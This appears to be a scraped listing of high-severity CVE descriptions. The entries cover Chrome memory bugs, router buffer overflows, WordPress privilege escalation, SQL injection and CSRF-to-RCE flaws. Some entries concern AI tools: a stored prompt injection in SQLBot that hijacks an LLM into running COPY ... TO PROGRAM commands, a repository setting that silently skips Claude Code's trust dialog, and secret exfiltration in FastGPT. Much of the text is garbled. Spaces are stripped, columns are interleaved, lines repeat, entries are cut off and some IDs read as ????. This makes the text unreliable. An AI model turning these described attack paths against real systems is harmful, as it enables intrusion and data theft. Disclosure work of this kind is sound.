Details4639 CVE- UseafterfreeinExtensionsinGoogleChromepriorto146.0.7680.153allowedanattackerwhoconvincedauser More2026- toinstallamaliciousextensiontopotentiallyexploitheapcorruptionviaacraftedChromeExtension.(Chromium 8.8 Details4458 securityseverity:High) ClipBucketv5isanopensourcevideosharingplatform.Anauthenticatedtime-basedblindSQLinjectionCVE- vulnerabilityexistsinClipBucketpriorto5.5.3#80withintheactions/ajax.phpendpoint.Duetoinsufficient More2026- 8.8 inputsanitizationoftheuseridparameter,anauthenticatedattackercanexecutearbitrarySQLqueries,leading Details32321 tofulldatabasedisclosureandpotentialadministrativeaccounttakeover.Version5.5.3#80fixestheissue. ClaudeCodeisanagenticcodingtool.Versionspriorto2.1.53resolvedthepermissionmodefromsettingsfiles, includingtherepo-controlled.claude/settings.json,beforedeterminingwhethertodisplaytheworkspacetrust CVE- confirmationdialog.Amaliciousrepositorycouldsetpermissions.defaultModetobypassPermissionsinits More2026- committed.claude/settings.json,causingthetrustdialogtobesilentlyskippedonfirstopen.Thisallowedauser 8.8 Details33068 tobeplacedintoapermissivemodewithoutseeingthetrustconfirmationprompt,makingiteasierforan attacker-controlledrepositorytogaintoolexecutionwithoutexplicituserconsent.Thisissuehasbeenpatchedin version2.1.53. AvulnerabilitywasidentifiedinD-LinkDHP-13201.00WWB04.ThisaffectsthefunctionredirectcountdownpageCVE- ofthecomponentSOAPHandler.Suchmanipulationleadstostack-basedbufferoverflow.Theattackcanbe More2026- 8.8 executedremotely.Theexploitispubliclyavailableandmightbeused.Thisvulnerabilityonlyaffectsproducts Details4529 thatarenolongersupportedbythemaintainer. 
The'TheUltimateWordPressToolkit–WPExtended'pluginforWordPressisvulnerabletoPrivilegeEscalationin allversionsupto,andincluding,3.2.4.ThisisduetotheisDashboardOrProfileRequest()methodintheMenu Editormoduleusinganinsecurestrpos()checkagainst`$SERVER['REQUESTURI']todetermineifarequest CVE- targetsthedashboardorprofilepage.ThegrantVirtualCaps()method,whichishookedintotheuserhascapMore 8.8 filter,grantselevatedcapabilitiesincludingmanageoptions`whenthischeckreturnstrue.Thismakesitpossible Details forauthenticatedattackers,withSubscriber-levelaccessandabove,togainadministrativecapabilitiesby appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand ultimatelycreatenewAdministratoraccounts.

CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 8.8 rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33848 CVE- AflawhasbeenfoundinTendaFH4511.0.0.9.ThisaffectsthefunctionformWrlExtraSetofthefile More2026- /goform/WrlExtraSet.ThismanipulationoftheargumentGOcausesstack-basedbufferoverflow.Theattackcan 8.8 Details4534 beinitiatedremotely.Theexploithasbeenpublishedandmaybeused. CVE- OutofboundsreadinSkiainGoogleChromepriorto146.0.7680.153allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4460 CVE- UseafterfreeinFedCMinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecutearbitrary More2026- 8.8 codeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4680 CVE- AvulnerabilityhasbeenfoundinTendaFH4511.0.0.9.ThisvulnerabilityaffectsthefunctionWrlclientSetofthe More2026- file/goform/WrlclientSet.SuchmanipulationoftheargumentGOleadstostack-basedbufferoverflow.Theattack 8.8 Details4535 canbelaunchedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. CVE- IntegeroverflowinFontsinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemorywriteviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4679 CVE- UseafterfreeinWebGPUinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecute More2026- 8.8 arbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4678 CVE- InappropriateimplementationinWebAudioinGoogleChromepriorto146.0.7680.165allowedaremoteattacker More2026- 8.8 toperformanoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4677

DNAsequencealignmentdata.WhilemostalignmentrecordsstoreDNAsequenceandqualityvalues,theformat alsoallowsthemtoomitthisdataincertaincasestosavespace.DuetosomequirksoftheCRAMformat,itis necessarytohandletheserecordscarefullyastheywillactuallystoredatathatneedstobeconsumedandthenCVE-discarded.Unfortunatelythecram_decode_seq()didnothandlethiscorrectlyinsomecases.Wherethis More2026- 8.8happeneditcouldresultinreadingasinglebytefrombeyondtheendofaheapallocation,followedbywritinga Details31962singleattacker-controlledbytetothesamelocation.Exploitingthisbugcausesaheapbufferoverflow.Ifauser opensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheap structuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution. Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More2026- 8.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33849 CVE-UseafterfreeinBlinkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More2026- 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4449 Jenkins2.554andearlier,LTS2.541.2andearlierdoesnotsafelyhandlesymboliclinksduringtheextractionof CVE-.tarand.tar.gzarchives,allowingcraftedarchivestowritefilestoarbitrarylocationsonthefilesystem,restricted More2026-onlybyfilesystemaccesspermissionsoftheuserrunningJenkins.Thiscanbeexploitedtodeploymalicious 8.8 Details33001scriptsorpluginsonthecontrollerbyattackerswithItem/Configurepermission,orabletocontrolagent processes. 
CVE-InsufficientvalidationofuntrustedinputinNavigationinGoogleChromepriorto146.0.7680.153allowedaremote More2026-attackerwhohadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTML 8.8 Details4451page.(Chromiumsecurityseverity:High) CVE-IntegeroverflowinANGLEinGoogleChromeonWindowspriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4452 TheExpireUserspluginforWordPressisvulnerabletoPrivilegeEscalationinallversionsupto,andincluding,CVE-1.2.2.Thisisduetothepluginallowingausertoupdatethe'onexpiredefaulttorole'metathroughthe More2026- 8.8'saveextrauserprofilefields'function.Thismakesitpossibleforauthenticatedattackers,withSubscriber-level Details accessandabove,toelevatetheirprivilegestothatofanadministrator. InJujufromversion3.0.0through3.6.18,theauthorizationofthe"secret-set"toolisnotperformedcorrectly,CVE- whichallowsagranteetoupdatethesecretcontent,andcanleadtoreadingorupdatingothersecrets.Whenthe 8.8 More 32693"secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details 32693 "secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details thenewvalueisvisibletoboththeownerandthegrantee. 
TheimportformCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstouploadandinstallmalicious formdefinitionsthroughaCSRFattack.ThevulnerablecForm.importformfunctionlacksCSRFtokenvalidation, enablingmaliciouswebsitestoforgefileuploadrequeststhatinstallattacker-controlledformswhenan authenticatedadministratorvisitsacraftedwebpage.FullexploitationofthisvulnerabilitywouldrequiretheCVE-victimtoselectamaliciousZIPfilecontainingformdefinitions,whichcanbeautomaticallygeneratedbythe More2025- 8.8exploitpageandusedtocreatedatacollectionformsthatstealsensitiveinformation.Successfulexploitationof Details55040theimportformCSRFvulnerabilitycouldresultintheinstallationofmaliciousdatacollectionformsonthetarget MuraCMSwebsitethatcanstealsensitiveuserinformation.Whenanauthenticatedadministratorvisitsa maliciouswebpagecontainingtheCSRFexploitandselectstheattacker-generatedZIPfile,theirbrowseruploads andinstallsformdefinitionsthatcreatelegitimateformsthatcouldbedesignedwithmaliciouscontent. 
TheTrashRestoreCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstorestoredeletedcontent fromthetrashtounauthorizedlocationsthroughCSRF.ThevulnerablecTrash.restorefunctionlacksCSRFtoken validation,enablingmaliciouswebsitestoforgerequeststhatrestorecontenttoarbitraryparentlocationswhen anauthenticatedadministratorvisitsacraftedwebpage.SuccessfulexploitationoftheTrashRestoreCSRF CVE-vulnerabilityresultsinunauthorizedrestorationofdeletedcontenttopotentiallyinappropriateormalicious More2025-locationswithintheMuraCMSwebsitestructure.Whenanauthenticatedadministratorvisitsamaliciouswebpage 8.8 Details55044containingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthatrestoresspecifiedcontent fromthetrashtoalocationdeterminedbytheattackerthroughtheparentidparameter.Thiscanleadto restorationofpreviouslydeletedmaliciouscontent,placementofsensitivedocumentsinpublicareas, manipulationofwebsitenavigationstructure,orrestorationofoutdatedcontentthatwasintentionallyremoved forsecurityorcompliancereasons. CVE-UseafterfreeinNetworkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4454 PhreeBooksERP5.2.3containsaremotecodeexecutionvulnerabilityintheimagemanagerthatallowsCVE-authenticatedattackerstouploadandexecutearbitraryPHPfilesbybypassingfileextensioncontrols.Attackers More2019- 8.8canuploadmaliciousPHPfilesthroughtheimagemanagerendpointandexecutethemtoestablishreverseshell Details25647connectionsandexecutesystemcommands. CVE-Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 8.8ImageMagick7:before7.1.2-10. 
Details33854 ThePhotoGallery,Sliders,ProofingandThemes–NextGENGallerypluginforWordPressisvulnerabletoLocalFile Inclusioninallversionsupto,andincluding,4.0.3viathe'template'parameteringalleryshortcodes.ThismakesCVE-itpossibleforauthenticatedattackers,withAuthor-levelaccessandabove,toincludeandexecutearbitrary.php More2026- 8.8filesontheserver,allowingtheexecutionofanyPHPcodeinthosefiles.Thiscanbeusedtobypassaccess Details1463controls,obtainsensitivedata,orachievecodeexecutionincaseswhere.phpfiletypescanbeuploadedand included. CVE-HeapbufferoverflowinPDFiuminGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8potentiallyexploitheapcorruptionviaacraftedPDFfile.(Chromiumsecurityseverity:High) Details4455 PhreeBooksERP5.2.3containsanarbitraryfileuploadvulnerabilityintheImageManagercomponentthatallowsCVE-authenticatedattackerstouploadmaliciousfilesbysubmittingrequeststotheimageuploadendpoint.Attackers More2019- 8.8canuploadPHPfilesthroughtheimgFileparametertothebizuno/image/managerendpointandexecutethemvia Details25630thebizunoFS.phpscriptforremotecodeexecution. CVE-Alow-privilegedremoteattackermaybeabletoreplacethebootapplicationoftheCODESYSControlruntime More2025- 8.8system,enablingunauthorizedcodeexecution. Details41660 CVE-UseafterfreeinDigitalCredentialsAPIinGoogleChromepriorto146.0.7680.153allowedaremoteattackerwho More2026-hadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTMLpage. 
8.8 Details4456(Chromiumsecurityseverity:High) FastGPTisanAIAgentbuildingplatform.Inversions4.14.8.3andbelow,thefastgpt-preview-image.ymlworkflow CVE-isvulnerabletoarbitrarycodeexecutionandsecretexfiltrationbyanyexternalcontributor.Ituses More2026-pullrequesttarget(whichrunswithaccesstorepositorysecrets)butchecksoutcodefromthepullrequest 8.8 Details33075author'sfork,thenbuildsandpushesDockerimagesusingattacker-controlledDockerfiles.Thisalsoenablesa supplychainattackviatheproductioncontainerregistry.Apatchwasnotavailableatthetimeofpublication.

Priortoversions7.15.1and8.9.3,theretrieve()functionininclude/OutboundEmail/OutboundEmail.phpfailsto properlyneutralizetheusercontrolled$idparameter.Itisassumedthatthefunctioncallingretrieve()will appropriatelyquoteandsanitizetheuserinput.However,twolocationshavebeenidentifiedthatcanbereachedCVE- MorethroughtheEmailUIAjaxactionontheEmail()modulewherethisisnotthecase.Assuch,itispossibleforan 8.8 authenticatedusertoperformSQLinjectionthroughtheretrieve()function.Thisaffectsthelatestmajor Details29099 versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible foranattackertoretrievearbitraryinformationfromthedatabase,includinguserinformationandpassword hashes.Versions7.15.1and8.9.3patchtheissue. CVE-UseafterfreeinDawninGoogleChromepriorto146.0.7680.165allowedaremoteattackertopotentiallyperform More 8.8asandboxescapeviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4676 CVE-HeapbufferoverflowinWebGLinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperform More2026- 8.8anoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4675 CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4461 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,therestreamerendpoint constructsalogfilepathbyembeddinguser-controlledusers_idandliveTransmitionHistory_idvaluesfromtheCVE-JSONrequestbodywithoutanysanitization.Thislogfilepathisthenconcatenateddirectlyintoshellcommands More2026- 
8.8passedtoexec(),allowinganauthenticatedusertoachievearbitrarycommandexecutionontheserverviashell Details33648metacharacterssuchas$()orbackticks.Commit99b865413172045fef6a98b5e9bfc7b24da11678containsa patch. BMCFootPrintsITSMversions20.20.02through20.24.01.001containadeserializationofuntrusteddata CVE-vulnerabilityintheASP.NETservlet'sVIEWSTATEhandlingthatallowsauthenticatedattackerstoexecutearbitrary More2025-code.AttackerscansupplycraftedserializedobjectstotheVIEWSTATEparametertoachieveremotecode 8.8 Details71260executionandfullycompromisetheapplication.Thefollowinghotfixesremediatethevulnerability:20.20.02, 20.20.03.002,20.21.01.001,20.21.02.002,20.22.01,20.22.01.001,20.23.01,20.23.01.002,and20.24.01. CVE-DevomeGRRv4.5.0wasdiscoveredtocontainmultipleauthenticatedSQLinjectionvulnerabilitiesinthe More2026- 8.8include/session.inc.phpfileviatherefereranduser-agent. Details30711 AweaknesshasbeenidentifiedinD-LinkDIR-5131.10.Theimpactedelementisthefunction CVE-formEasySetTimezoneofthefile/goform/formEasySetTimezoneofthecomponentboa.Thismanipulationofthe More2026-argumentcurTimecausesstack-basedbufferoverflow.Theattackcanbeinitiatedremotely.Theexploithasbeen 8.8 Details4555madeavailabletothepublicandcouldbeusedforattacks.Thisvulnerabilityonlyaffectsproductsthatareno longersupportedbythemaintainer. BlinkoisanAI-poweredcardnote-takingproject.Priortoversion1.8.4,thereisaprivilegeescalationvulnerability. 
TheupsertUserendpointhas3issues:itismissingsuperAdminAuthMiddleware,anylogged-inusercancallit;theCVE-originalPasswordisanoptionalparameterandifnotprovidedpasswordverificationisskipped;thereisnocheck More2026- 8.8forinput.id===ctx.id(ownershipverification).Thiscouldresultinanyauthenticatedusermodifyingotherusers' Details23480passwords,directescalationtosuperadmin,andcompleteaccounttakeover.Thisissuehasbeenpatchedin version1.8.4. AflawhasbeenfoundinLinksysMR96002.0.6.206937.AffectedisthefunctionsmartConnectConfigureofthefile CVE-SmartConnect.lua.Executingamanipulationoftheargument More2026-configApSsid/configApPassphrase/srpLogin/srpPasswordcanleadtooscommandinjection.Theattackmaybe 8.8 Details4558launchedremotely.Theexploithasbeenpublishedandmaybeused.Thevendorwascontactedearlyaboutthis

CVE-2026-33717 | 8.8 | downloadVideoFromDownloadURL() function in objects/aVideoEncoder.json.php saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including .php). By providing an invalid resolution parameter, an attacker triggers an early die() via forbiddenPage() before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the webroot at videos/cache/tmpFile/. Commit 6da79b43484099a0b660d1544a63c07b633ed3a2 contains a patch.

CVE-2026-33025 | 8.8 | AVideo is a video-sharing Platform. Versions prior to 8.0 contain a SQL Injection vulnerability in the getSqlFromPost() method of Object.php. The $_POST['sort'] array keys are used directly as SQL column identifiers inside an ORDER BY clause. Although real_escape_string() was applied, it only escapes string-context characters (quotes, null bytes) and provides no protection for SQL identifiers, making it entirely ineffective here. This issue has been fixed in version 8.0. To work around this issue without upgrading, operators can apply a WAF rule to block POST requests where any sort[*] key contains characters outside [A-Za-z0-9]. Alternatively, restrict access to the queue view (queue.json.php, index.php) to trusted IP ranges only.

CVE-2026-33647 | 8.8 | ImageGallery::saveFile() method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a .php extension. The MIME check passes, but the file is saved as an executable .php file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.

CVE-????-????? | 8.8 | Out of bounds read in CSS in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)

CVE-????-32042 | 8.8 | OpenClaw versions 2026.2.22 prior to 2026.2.25 contain a privilege escalation vulnerability allowing unpaired device identities to bypass operator pairing requirements and self-assign elevated operator scopes including operator.admin. Attackers with valid shared gateway authentication can present a self-signed unpaired device identity to request and obtain higher operator scopes before pairing approval is granted.

CVE-2026-4565 | 8.8 | A vulnerability was detected in Tenda AC21 16.03.08.16. Impacted is the function formSetQosBand of the file /goform/SetNetControlList. Performing a manipulation of the argument list results in buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.

CVE-2026-4566 | 8.8 | A flaw has been found in Belkin F9K1122 1.00.33. The affected element is the function formWISP5G of the file /goform/formWISP5G. Executing a manipulation of the argument webpage can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was

CVE-2026-33507 | 8.8 | objects/pluginImport.json.php endpoint allows admin users to upload and install plugin ZIP files containing executable PHP code, but lacks any CSRF protection. Combined with the application explicitly setting session.cookie_samesite='None' for HTTPS connections, an unauthenticated attacker can craft a page that, when visited by an authenticated admin, silently uploads a malicious plugin containing a PHP webshell, achieving Remote Code Execution on the server. Commit d1bc1695edd9ad4468a48cea0df6cd943a2635f3 contains a patch.

CVE-2026-24516 | 8.8 | A command injection vulnerability exists in DigitalOcean Droplet Agent through 1.3.2. The troubleshooting actioner component (internal/troubleshooting/actioner/actioner.go) processes metadata from the metadata service endpoint and executes commands specified in the TroubleshootingAgent.Requesting array without adequate input validation. While the code validates that artifacts exist in the validInvestigationArtifacts map, it fails to sanitize the actual command content after the "command:" prefix. This allows an attacker who can control metadata responses to inject and execute arbitrary OS commands with root privileges. The attack is triggered by sending a TCP packet with specific sequence numbers to the SSH port, which causes the agent to fetch metadata from http://169.254.169.254/metadata/v1.json. The vulnerability affects the command execution flow in internal/troubleshooting/actioner/actioner.go (insufficient validation), internal/troubleshooting/command/exec.go (direct exec.CommandContext call), and internal/troubleshooting/command/command.go (command parsing without sanitization). This can lead to complete system compromise, data exfiltration, privilege escalation, and potential lateral movement across cloud infrastructure.

CVE-2026-33479 | 8.8 | WWBN AVideo is an open source video platform. In versions up to and including 26.0, the Gallery plugin's saveSort.json.php endpoint passes unsanitized user input from $_REQUEST['sections'] array values directly into PHP's eval() function. While the endpoint is gated behind User::isAdmin(), it has no CSRF token validation. Combined with AVideo's explicit SameSite=None session cookie configuration, an attacker can exploit this via cross-site request forgery to achieve unauthenticated remote code execution, requiring only that an admin visits an attacker-controlled page. Commit 087dab8841f8bdb54be184105ef19b47c5698fcb contains a patch.

CVE-2026-32622 | 8.8 | SQLBot is an intelligent data query system based on a large language model and RAG. Versions 1.5.0 and below contain a Stored Prompt Injection vulnerability that chains three flaws: a missing permission check on the Excel upload API allowing any authenticated user to upload malicious terminology, unsanitized storage of terminology descriptions containing dangerous payloads, and a lack of semantic fencing when injecting terminology into the LLM's system prompt. Together, these flaws allow an attacker to hijack the LLM's reasoning to generate malicious PostgreSQL commands (e.g., COPY ... TO PROGRAM), ultimately achieving Remote Code Execution on the database or application server with postgres user privileges. The issue is fixed in v1.6.0.

CVE-2026-32013 | 8.8 | OpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in the agents.files.get and agents.files.set methods that allows reading and writing files outside the agent workspace. Attackers can exploit symlinked allowlisted files to access arbitrary host files within gateway process permissions, potentially enabling code execution through file overwrite attacks.

CVE-2026-32051 | 8.8 | OpenClaw versions prior to 2026.3.1 contain an authorization mismatch vulnerability that allows authenticated callers with operator.write scope to invoke owner-only tool surfaces including gateway and cron through agent runs in scoped-token deployments. Attackers with write-scope access can perform control-plane actions beyond their intended authorization level by exploiting inconsistent owner-only gating during agent execution.

CVE-2026-25445 | 8.8 | Deserialization of Untrusted Data vulnerability in Membership Software WishList Member X allows Object Injection. This issue affects WishList Member X: from n/a through 3.29.0.

CVE-2026-4553 | 8.8 | A vulnerability was identified in Tenda F453 1.0.0.3. Impacted is the function fromNatlimit of the file /goform/Natlimit of the component Parameters Handler. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

CVE-????-????? | 8.8 | Heap buffer overflow in WebAudio in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)

CVE-????-????? | 8.8 | Out of bounds read in Blink in Google Chrome prior to 146.0.7680.153 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVE-2026-4463 | 8.8 | Heap buffer overflow in WebRTC in Google Chrome prior to 146.0.7680.153 allowed a remote attacker to

CVE-2026-4464 | 8.8 | Integer overflow in ANGLE in Google Chrome prior to 146.0.7680.153 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

CVE-2026-3533 | 8.8 | The JupiterX Core plugin for WordPress is vulnerable to limited file uploads due to missing authorization on import_popup_templates() function as well as insufficient file type validation in the upload_files() function in all versions up to, and including, 4.14.1. This makes it possible for Authenticated attackers with Subscriber-level access and above, to upload files with dangerous types that can lead to Remote Code Execution on servers configured to handle .phar files as executable PHP (e.g., Apache + mod_php), or Stored Cross-Site Scripting via .svg, .dfxp, or .xhtml files upload on any server configuration.

CVE-2026-4439 | 8.8 | Out of bounds memory access in WebGL in Google Chrome on Android prior to 146.0.7680.153 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

CVE-2026-33046 | 8.8 | Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. In versions prior to 3.3.12, due to vulnerabilities in TeXLive and obscure LaTeX syntax that allowed circumventing Indico's LaTeX sanitizer, it is possible to use specially-crafted LaTeX snippets which can read local files or execute code with the privileges of the user running Indico on the server. Note that if server-side LaTeX rendering is not in use (ie XELATEX_PATH was not set in indico.conf), this vulnerability does not apply. It is recommended to update to Indico 3.3.12 as soon as possible. It is also strongly recommended to enable the containerized LaTeX renderer (using podman), which isolates it from the rest of the system. As a workaround, remove the XELATEX_PATH setting from indico.conf (or comment it out or set it to None) and restart the indico-uwsgi and indico-celery services to disable LaTeX functionality.

CVE-2026-4475 | 8.8 | A vulnerability has been found in Yi Technology YI Home Camera 22.1.120171024151200. The affected element is an unknown function of the file home/web/ipc. Such manipulation leads to hard-coded credentials. Access to the local network is required for this attack to succeed. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2026-32276 | 8.8 | versions on the 2.x series up to and including 2.41.0, an authenticated user may be able to execute arbitrary code in the Code Study Plugin. Versions 1.41.1 and 2.41.1 contain a patch.

CVE-2026-32888 | 8.8 | Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Versions contain an SQL Injection in the Items search functionality. When the custom attribute search feature is enabled (search custom filter), user-supplied input from the search GET parameter is interpolated directly into a HAVING clause without parameterization or sanitization. This allows an authenticated attacker with basic item search permissions to execute arbitrary SQL queries. A patch did not exist at the time of publication.

CVE-2025-60947 | 8.8 | Census CSWeb 8.0.1 allows arbitrary file upload. A remote, authenticated attacker could upload a malicious file, possibly leading to remote code execution. Fixed in 8.1.0 alpha.

CVE-2026-33053 | 8.8 | Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.

CVE-2026-4551 | 8.8 | A vulnerability was found in Tenda F453 1.0.0.3. This vulnerability affects the function fromSafeClientFilter of the file /goform/SafeClientFilter of the component Parameters Handler. Performing a manipulation of the argument menufacturer/Go results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

CVE-2025-60946 | 8.8 | Census CSWeb 8.0.1 allows arbitrary file path input. A remote, authenticated attacker could access unintended file directories. Fixed in 8.1.0 alpha.

CVE-2026-4552 | 8.8 | A vulnerability was determined in Tenda F453 1.0.0.3. This issue affects the function fromVirtualSer of the file /goform/VirtualSer of the component Parameters Handler. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

CVE-????-????? | 8.8 | Out of bounds write in V8 in Google Chrome prior to 146.0.7680.153 allowed a remote attacker to potentially

CVE-????-58112 | 8.8 | Microsoft Dynamics 365 Customer Engagement (on-premises) 1612 (9.0.2.3034) allows the generation of customized reports via raw SQL queries in an upload of a .rdl (Report Definition Language) file; this is then processed by the SQL Server Reporting Service. An account with the privilege Add Reporting Services Reports can upload a malicious rdl file. If the malicious rdl file is already loaded and it is executable by the user, the Add Reporting Services Reports privilege is not required. A malicious actor can trigger the generation of the report, causing the execution of arbitrary SQL commands in the underlying database. Depending on the permissions of the account running SQL Server Reporting Services, the attacker may be able to perform additional actions, such as accessing linked servers or executing operating system commands.
SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containacriticalSQLInjectionvulnerabilityinthe/api/v1/datasource/uploadExcelendpointthatenablesRemote CodeExecution(RCE),allowinganyauthenticateduser(eventhelowest-privileged)tofullycompromisethe backendserver.Therootcauseistwofold:ExcelSheetnamesareconcatenateddirectlyintoPostgreSQLtable CVE-nameswithoutsanitization(datasource.py#L351),andthosetablenamesareembeddedintoCOPYSQL More2026-statementsviaf-stringsinsteadofparameterizedqueries(datasource.py#L385-L388).Anattackercanbypassthe 8.8 Details3295031-characterSheetnamelimitusingatwo-stagetechnique—firstuploadinganormalfilewhosedatarowscontain shellcommands,thenuploadinganXML-tamperedfilewhoseSheetnameinjectsaTOPROGRAM'sh'clauseinto theSQL.Confirmedimpactsincludearbitrarycommandexecutionasthepostgresuser(uid=999),sensitivefile exfiltration(e.g.,/etc/passwd,/etc/shadow),andcompletePostgreSQLdatabasetakeover.Thisissuehasbeen fixedinversion1.7.0. TheCMSCommanderpluginforWordPressisvulnerabletoSQLInjectionviathe'orblogname', 'orblogdescription',and'oradminemail'parametersinallversionsupto,andincluding,2.288.ThisisduetoCVE-insufficientescapingontheusersuppliedparametersandlackofsufficientpreparationontheexistingSQL More2026- 8.8queriesintherestoreworkflow.Thismakesitpossibleforauthenticatedattackers,withCMSCommanderAPIkey Details3334access,toappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitive informationfromthedatabase. 
AvulnerabilitywasfoundinD-LinkDIR-5131.10.ThisaffectsthefunctionformEasySetPasswordofthefileCVE-/goform/formEasySetPasswordofthecomponentWebService.ThemanipulationoftheargumentcurTimeresults More2026- 8.8instack-basedbufferoverflow.Theattackmaybeperformedfromremote.Theexploithasbeenmadepublicand Details4486couldbeused.Thisvulnerabilityonlyaffectsproductsthatarenolongersupportedbythemaintainer. CVE-AvulnerabilitywasdetectedinTendaA18Pro02.03.02.28.Thisvulnerabilityaffectsthefunction More2026-formfastsettingwifisetofthefile/goform/fastsettingwifiset.Themanipulationresultsinstack-basedbuffer 8.8 Details4489overflow.Theattackmaybelaunchedremotely.Theexploitisnowpublicandmaybeused. CVE-AflawhasbeenfoundinTendaA18Pro02.03.02.28.ThisissueaffectsthefunctionsetSchedWifiofthefile More2026-/goform/openSchedWifi.Thismanipulationcausesstack-basedbufferoverflow.Remoteexploitationoftheattack 8.8 Details4490ispossible.Theexploithasbeenpublishedandmaybeused. CVE-AvulnerabilityhasbeenfoundinTendaA18Pro02.03.02.28.ImpactedisthefunctionfromSetIpMacBindofthe More2026-file/goform/SetIpMacBind.Suchmanipulationoftheargumentlistleadstostack-basedbufferoverflow.Theattack 8.8 Details4491canbeexecutedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. 
CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8executearbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4447 CVE-AvulnerabilitywasfoundinTendaA18Pro02.03.02.28.TheaffectedelementisthefunctionsetqosMiblistof More2026-thefile/goform/formSetQosBand.Performingamanipulationoftheargumentlistresultsinstack-basedbuffer 8.8 Details4492overflow.Theattackispossibletobecarriedoutremotely.Theexploithasbeenmadepublicandcouldbeused. CVE-AnImproperInputValidationvulnerabilityinUniFiNetworkServermayallowunauthorizedaccesstoanaccountif More2026-theaccountownerissociallyengineeredintoclickingamaliciouslink.AffectedProducts:UniFiNetworkServer 8.8 Details22559(Version10.1.85andearlier)Mitigation:UpdateUniFiNetworkServertoVersion10.1.89orlater. KanboardisprojectmanagementsoftwarefocusedonKanbanmethodology.Priorto1.2.51,Kanboard'suserCVE-inviteregistrationendpoint(UserInviteController::register())acceptsallPOSTparametersandpassesthemto More2026- 8.8UserModel::create()withoutfilteringouttherolefield.Anattackerwhoreceivesaninvitelinkcaninject 